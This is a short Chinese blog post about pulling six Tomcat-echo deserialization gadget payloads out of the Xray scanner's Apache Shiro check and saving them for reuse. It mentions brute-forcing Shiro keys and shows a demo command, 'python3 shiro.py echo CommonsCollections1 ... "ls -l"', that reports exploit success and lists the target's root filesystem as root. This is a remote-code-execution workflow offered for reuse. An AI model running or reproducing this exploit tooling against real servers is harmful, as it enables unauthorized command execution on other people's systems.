Shiro反序列化Xray6个tomcat回显Gadget Payload提取

Xray反序列化Payload提取

Xray新版本支持了shiro反序列化的检测,前提是拥有高级版License

对于shiro反序列化的检测首先会使用默认key尝试6个回显Gadget,然后尝试使用连平台,全部失败之后会尝试内置的100个key进行爆破

有价值的就是那6个支持tomcat全版本回显的Payload了

分别是CommonsCollections1 CommonsCollections2 CommonsBeanutils1 CommonsBeanutils2 Jdk7u21 Jdk8u20

获取到Payload之后解密然后base64保存,以后就可以直接拿来用了,不会影响后面改key的情况

提取之后的Payload在下面的脚本里

使用效果:

╭─[aresx@AresX-Mac]-[~/tools/shiro]  ‹master*›
╰─➤ python3 shiro.py echo CommonsCollections1 http://127.0.0.1:9080/login "ls -l"
Congratulation: exploit success

total 21836
drwxr-xr-x   1 root root     4096 Oct 21  2016 bin
drwxr-xr-x   2 root root     4096 Sep 12  2016 boot
drwxr-xr-x   5 root root      340 Jul 16 06:14 dev
drwxr-xr-x   1 root root     4096 Apr 19 17:37 etc
drwxr-xr-x   2 root root     4096 Sep 12  2016 home
drwxr-xr-x   1 root root     4096 Oct 31  2016 lib
drwxr-xr-x   2 root root     4096 Oct 20  2016 lib64
drwxr-xr-x   2 root root     4096 Oct 20  2016 media
drwxr-xr-x   2 root root     4096 Oct 20  2016 mnt
drwxr-xr-x   2 root root     4096 Oct 20  2016 opt
dr-xr-xr-x 167 root root        0 Jul 16 06:14 proc
drwx------   1 root root     4096 Jul 22 09:53 root
drwxr-xr-x   3 root root     4096 Oct 20  2016 run
drwxr-xr-x   2 root root     4096 Oct 20  2016 sbin
-rw-r--r--   1 root root 22290368 Dec 19  2019 shirodemo-1.0-SNAPSHOT.jar
drwxr-xr-x   2 root root     4096 Oct 20  2016 srv
dr-xr-xr-x  13 root root        0 Jul 21 16:04 sys
drwxrwxrwt   1 root root     4096 Jul 16 06:14 tmp
drwxr-xr-x   1 root root     4096 Oct 31  2016 usr
drwxr-xr-x   1 root root     4096 Oct 31  2016 var

服务器资源由ZeptoVM赞助

Partners Wiki IRC